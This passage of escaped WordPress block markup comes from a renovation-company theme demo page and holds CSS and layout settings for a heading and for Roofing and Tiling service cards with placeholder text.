{\"columns\":1,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"375581fb-9e6e-45fe-9dab-34bea359d209\"} -->\n<style type=\"text/css\"> .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-375581fb-9e6e-45fe-9dab-34bea359d209 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-375581fb-9e6e-45fe-9dab-34bea359d209 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-1\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"width\":100,\"blockId\":\"825826a4-2470-420b-8975-2a4a1a7868dd\"} -->\n<style type=\"text/css\"> .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 976px){\n .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-825826a4-2470-420b-8975-2a4a1a7868dd .skt-blocks-block-column{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-825826a4-2470-420b-8975-2a4a1a7868dd\" style=\"width:100%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/advanced-heading {\"block_id\":\"c7afed5e-5df8-4702-b207-b6f377dbc6c4\",\"showHeading\":false,\"showSeparator\":false,\"subheadSpacing\":5,\"separatorSpacing\":0,\"headingTitleFontFamily\":\"Poppins\",\"headingTitleFontSize\":19,\"headingTitleFontSizeMobile\":19,\"headingTitleFontSizeTablet\":19,\"headingTitleColor\":\"#fe8333\",\"subHeadingTitleFontFamily\":\"Poppins\",\"subHeadingTitleFontSize\":42,\"subHeadingTitleFontSizeMobile\":30,\"subHeadingTitleFontSizeTablet\":30,\"subHeadingTitleFontWeight\":\"700\",\"subHeadingTitleLineHeight\":1.1,\"subHeadingTitleLetterSpacing\":1,\"subHeadingTitleColor\":\"#253242\",\"headingAlignmentTablet\":\"left\"} -->\n<style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n font-size: 19px !important; margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-seperator {\n margin-bottom: 0px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n margin-bottom: 5px !important; }\n}\n @media only screen and (min-width: 768px) and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-seperator {\n margin-bottom: 15px !important; }\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n margin-bottom: 15px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-title-text {\n font-size: 19px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n font-size: 42px !important; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 976px){\n\n.skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 .responsive-heading-desc-text {\n font-size: 30px; }\n}\n</style><style type=\"text/css\"> @media only screen and (min-width: 976px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 {\n text-align: center; }\n}\n @media only screen and (max-width: 976px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 {\n text-align: left; }\n}\n @media only screen and (max-width: 767px){\n .skt-blocks-block-advanced-heading.block-c7afed5e-5df8-4702-b207-b6f377dbc6c4 {\n text-align: center; }\n}\n</style><div class=\"skt-blocks-block-advanced-heading block-c7afed5e-5df8-4702-b207-b6f377dbc6c4\"><p class=\"responsive-heading-desc-text\" style=\"font-family:Poppins;font-weight:700;line-height:1.1;letter-spacing:1px;color:#253242\">We Provide the Best <br>Renovation</p></div>\n<!-- /wp:skt-blocks/advanced-heading --></div></div></div>\n<!-- /wp:skt-blocks/column --></div></div></div></div>\n<!-- /wp:skt-blocks/advance-columns -->\n\n<!-- wp:skt-blocks/section {\"contentWidth\":\"full_width\",\"blockId\":\"db861d8c-012c-44ce-a81f-cf42e03e55d4\",\"topPadding\":50,\"topPaddingMobile\":30,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"className\":\"gb-renovation-services\"} -->\n<div class=\"wp-block-skt-blocks-section gb-renovation-services skt-blocks-block-section-outer-wrap block-db861d8c-012c-44ce-a81f-cf42e03e55d4 background-type-none alignundefined\" style=\"z-index:1;max-width:;margin-left:;margin-right:\"><style type=\"text/css\"> @media only screen and (max-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 10px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 30px; padding-bottom: 10px; padding-left: 10px; padding-right: 10px; }\n}\n @media only screen and (min-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .skt-blocks-block-section{\n margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; padding-top: 50px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; }\n}\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image{\n background-image: linear-gradient(rgba(255, 255, 255, 0.2),rgba(255, 255, 255, 0.2)),url(undefined); background-position: center-center; background-attachment: scroll; background-repeat: no-repeat; background-size: cover; border-radius: 0px; }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-color{\n background-color: rgba(255, 255, 255, 0.2); }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.skt-blocks-block-section-outer-wrap.background-type-image .skt-blocks-block-section.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0.2) 0%, rgba(255, 255, 255, 0.2) 100%); }\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.background-type-video .skt-blocks-block-section {\n background-color: rgba(255, 255, 255, 0.2); }\n</style><style type=\"text/css\"> .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap {\n max-width : 100%; }\n @media only screen and (min-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 976px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n @media only screen and (max-width: 767px){\n .block-db861d8c-012c-44ce-a81f-cf42e03e55d4 .responsive-section-inner-wrap, .page.page-template-gutenberg-fullwidth .block-db861d8c-012c-44ce-a81f-cf42e03e55d4.alignfull .responsive-section-inner-wrap {\n max-width : 1140px !important; }\n}\n</style><section class=\"responsive-section-wrap skt-blocks-block-section overlay-type-color linear\" style=\"border-width:1px;border-style:none;border-radius:0;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-section-inner-wrap\" style=\"z-index:1\"><!-- wp:skt-blocks/advance-columns {\"columns\":3,\"topPadding\":0,\"bottomPadding\":0,\"leftPadding\":0,\"rightPadding\":0,\"opacity\":0,\"blockId\":\"02f18288-ea6e-4eb1-a7da-8789d44dd963\"} -->\n<style type=\"text/css\"> .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns.overlay-type-color{\n background-color: rgba(255, 255, 255, 0); }\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns.overlay-type-gradient.linear{\n background-image: linear-gradient(0deg, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns.overlay-type-gradient.radial{\n background-image: radial-gradient( at center center, rgba(255, 255, 255, 0) 0%, rgba(255, 255, 255, 0) 100%); }\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-column{\n min-height: ; align-items: flex-start; }\n @media only screen and (min-width: 976px){\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns{\n padding-top: 0px; padding-bottom: 0px; padding-left: 0px; padding-right: 0px; margin-top: 0px; margin-bottom: 0px; }\n}\n @media only screen and (max-width: 976px){\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n @media only screen and (max-width: 767px){\n .block-02f18288-ea6e-4eb1-a7da-8789d44dd963 .skt-blocks-block-columns{\n padding-top: undefinedpx; padding-bottom: undefinedpx; padding-left: undefinedpx; padding-right: undefinedpx; margin-top: undefinedpx; margin-bottom: undefinedpx; }\n}\n</style><div class=\"block-02f18288-ea6e-4eb1-a7da-8789d44dd963 skt-blocks-advanced-column-outer-wrap undefined\" style=\"z-index:1\"><div class=\"skt-blocks-advanced-column alignundefined\"><div class=\"responsive-columns-wrap skt-blocks-block-columns responsive-columns__gap-default responsive-columns__stack-mobile responsive-columns__content-width-theme overlay-type-color linear\" style=\"text-align:left;border-width:1px;border-style:none;box-shadow:0px 0px 0px 0px undefined \"><div class=\"responsive-columns-inner-wrap responsive-columns-columns-3\" style=\"max-width:100%\"><!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"3739cb8d-4f78-4247-ba9f-a12568b3ec04\",\"blockBorderRadius\":5,\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-3739cb8d-4f78-4247-ba9f-a12568b3ec04 .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-3739cb8d-4f78-4247-ba9f-a12568b3ec04\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;border-radius:5px;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadingTag\":\"h4\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"uploading\":false,\"date\":1622180355000,\"filename\":\"roofing.jpg\",\"menuOrder\":0,\"uploadedTo\":7,\"type\":\"image\",\"subtype\":\"jpeg\",\"id\":259,\"title\":\"roofing\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/home/roofing-2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"roofing-2\",\"status\":\"inherit\",\"modified\":1622180355000,\"mime\":\"image/jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 28, 2021\",\"nonces\":{\"update\":\"5f56d3c42c\",\"delete\":\"aef82b5b03\",\"edit\":\"25a8bb0d07\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=259u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"uploadedToTitle\":\"Home\",\"uploadedToLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=7u0026action=edit\",\"filesizeInBytes\":7947,\"filesizeHumanReadable\":\"8 KB\",\"context\":\"\",\"height\":65,\"width\":88,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\",\"height\":65,\"width\":88,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":88,\"resshowPrefix\":false,\"counterId\":\"c1193a68-cc43-4e87-8114-cad0ca591e6a\"} -->\n<style type=\"text/css\"> .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img {\n width: 88px; }\n}\n\n@media only screen and (max-width: 976px){\n\n.skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n\n@media only screen and (max-width: 767px){\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: undefinedpx; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: undefinedpx !important; }\n .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a .skt-blocks-ifb-image-content img {\n width: undefinedpx; }\n}\n</style><style type=\"text/css\"> .skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a.skt-blocks-infobox__content-wrap {\n text-align: center; }\n</style><div class=\"skt-blocks-infobox__outer-wrap responsive-blocks-block-team\" style=\"border-width:1px;background-color:rgba(255, 255, 255, 1);padding:0;border-style:none;box-shadow:0px 0px   undefined \"><div class=\"skt-blocks-block-c1193a68-cc43-4e87-8114-cad0ca591e6a skt-blocks-infobox__content-wrap skt-blocks-infobox skt-blocks-infobox-has-image skt-blocks-infobox-icon-above-title skt-blocks-infobox-image-valign-top skt-blocks-infobox-enable-border-radius \"><div class=\"skt-blocks-ifb-left-right-wrap\"><div class=\"skt-blocks-ifb-content\"><div class=\"skt-blocks-ifb-image-icon-content skt-blocks-ifb-imgicon-wrap\" style=\"margin-bottom:35px;margin-top:0;margin-left:0;margin-right:0\"><div class=\"skt-blocks-ifb-image\"><div class=\"skt-blocks-ifb-image-content\"><img class=\"\" src=\"https://cteisys.com/wp-content/uploads/2021/05/roofing.jpg\" alt=\"\" style=\"border-color:#333;border-radius:0;border-width:2px;border-style:none;box-shadow:0px 0px   undefined \"/></div></div></div><div class=\"skt-blocks-ifb-title-wrap\"><h4 class=\"skt-blocks-ifb-title\" style=\"color:#303030;font-weight:700;font-family:Poppins;margin-bottom:20px\">Roofing</h4></div><div class=\"skt-blocks-ifb-text-wrap\"><p class=\"skt-blocks-ifb-desc\" style=\"color:#494848;font-family:Poppins;font-weight:400;margin-bottom:30px\">Posuere tellus imperdiet facilisis.<br>Curabitur vaucibusy.</p><div class=\"skt-blocks-ifb-cta skt-blocks-infobox-cta-link-style\"><a href=\"https://sktperfectdemo.com/themepack/gbrenovate/services/roofing/\" target=\"_self\" class=\"skt-blocks-infobox-cta-link\" rel=\"noopener noreferrer\" style=\"color:#333;padding-top:10px;padding-bottom:10px;padding-left:14px;padding-right:14px\"><span class=\"skt-blocks-inline-editing\" style=\"color:#333\">Read More</span></a></div></div></div></div></div></div>\n<!-- /wp:skt-blocks/info-block --></div></div></div>\n<!-- /wp:skt-blocks/column -->\n\n<!-- wp:skt-blocks/column {\"topPadding\":50,\"bottomPadding\":50,\"leftPadding\":45,\"rightPadding\":30,\"leftMargin\":15,\"rightMargin\":15,\"topPaddingTablet\":30,\"bottomPaddingTablet\":30,\"leftPaddingTablet\":30,\"rightPaddingTablet\":30,\"leftMarginTablet\":10,\"rightMarginTablet\":10,\"topPaddingMobile\":50,\"bottomPaddingMobile\":50,\"leftPaddingMobile\":45,\"rightPaddingMobile\":30,\"bottomMarginMobile\":20,\"blockId\":\"f669cc7b-733a-44ee-ac24-f2194c21d8fa\",\"opacity\":100,\"backgroundType\":\"color\",\"backgroundColor\":\"#ffffff\"} -->\n<style type=\"text/css\"> .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column {\n box-shadow: 0px 0px 0px 0px undefined ; }\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column:hover {\n box-shadow: 0px 0px 0px 0px #cccccc ; }\n @media only screen and (min-width: 976px){\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 15px; margin-right: 15px; }\n}\n @media only screen and (max-width: 976px){\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column{\n padding-top: 30px; padding-bottom: 30px; padding-left: 30px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: undefinedpx; margin-left: 10px; margin-right: 10px; }\n}\n @media only screen and (max-width: 767px){\n .block-f669cc7b-733a-44ee-ac24-f2194c21d8fa .skt-blocks-block-column{\n padding-top: 50px; padding-bottom: 50px; padding-left: 45px; padding-right: 30px; margin-top: undefinedpx; margin-bottom: 20px; margin-left: undefinedpx; margin-right: undefinedpx; }\n}\n</style><div class=\"skt-blocks-advanced-column-child block-f669cc7b-733a-44ee-ac24-f2194c21d8fa\" style=\"width:50%\"><div class=\"responsive-column-wrap skt-blocks-block-column\" style=\"border-width:1px;border-style:none;background-color:rgba(255, 255, 255, 1)\"><div class=\"responsive-column-inner-wrap overlay-type-color linear\"><!-- wp:skt-blocks/info-block {\"resheadingColor\":\"#303030\",\"ressubheadingColor\":\"#494848\",\"resheadFontFamily\":\"Poppins\",\"ressubHeadFontFamily\":\"Poppins\",\"resheadFontSize\":25,\"ressubHeadFontSize\":17,\"ressubHeadFontWeight\":\"400\",\"resheadSpace\":20,\"ressubHeadSpace\":30,\"source_type\":\"image\",\"resseperatorStyle\":\"none\",\"resctaType\":\"text\",\"resctaLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/services/tiling/\",\"resctaLinkColor\":\"#303030\",\"iconTopMargin\":0,\"iconBottomMargin\":35,\"iconImage\":{\"id\":28,\"title\":\"services-img2\",\"filename\":\"services-img2.jpg\",\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"link\":\"https://sktperfectdemo.com/themepack/gbrenovate/services-img2/\",\"alt\":\"\",\"author\":\"1\",\"description\":\"\",\"caption\":\"\",\"name\":\"services-img2\",\"status\":\"inherit\",\"uploadedTo\":0,\"date\":\"2021-05-25T13:48:37.000Z\",\"modified\":\"2021-05-25T13:48:37.000Z\",\"menuOrder\":0,\"mime\":\"image/jpeg\",\"type\":\"image\",\"subtype\":\"jpeg\",\"icon\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-includes/images/media/default.png\",\"dateFormatted\":\"May 25, 2021\",\"nonces\":{\"update\":\"8af869eca5\",\"delete\":\"667bc07c15\",\"edit\":\"3755558faf\"},\"editLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/post.php?post=28u0026action=edit\",\"meta\":false,\"authorName\":\"gbrenovation\",\"authorLink\":\"https://sktperfectdemo.com/themepack/gbrenovate/wp-admin/profile.php\",\"filesizeInBytes\":3796,\"filesizeHumanReadable\":\"4 KB\",\"context\":\"\",\"height\":65,\"width\":77,\"orientation\":\"landscape\",\"sizes\":{\"full\":{\"url\":\"https://cteisys.com/wp-content/uploads/2021/05/services-img2.jpg\",\"height\":65,\"width\":77,\"orientation\":\"landscape\"}},\"compat\":{\"item\":\"\",\"meta\":\"\"}},\"imageWidth\":77,\"resshowPrefix\":false,\"counterId\":\"46f78be9-957d-405f-b7f8-a348f80cff99\"} -->\n<style type=\"text/css\"> .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing{\n color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button:hover {\n background-color: transparent; border-color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-cta-button .skt-blocks-inline-editing:hover{\n color: #333; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-icon svg{\n fill: #3a3a3a; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-icon:hover svg{\n fill: #3a3a3a; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img{\n opacity: 1 }\n</style><style type=\"text/css\">\n@media only screen and (min-width: 976px){\n\n.skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-title {\n font-size: 25px !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99.skt-blocks-infobox__content-wrap .skt-blocks-ifb-desc {\n font-size: 17px !important; }\n .skt-blocks-block-46f78be9-957d-405f-b7f8-a348f80cff99 .skt-blocks-ifb-image-content img {\n width: 77px; }\n}\n\n@media only screen and (max-width: 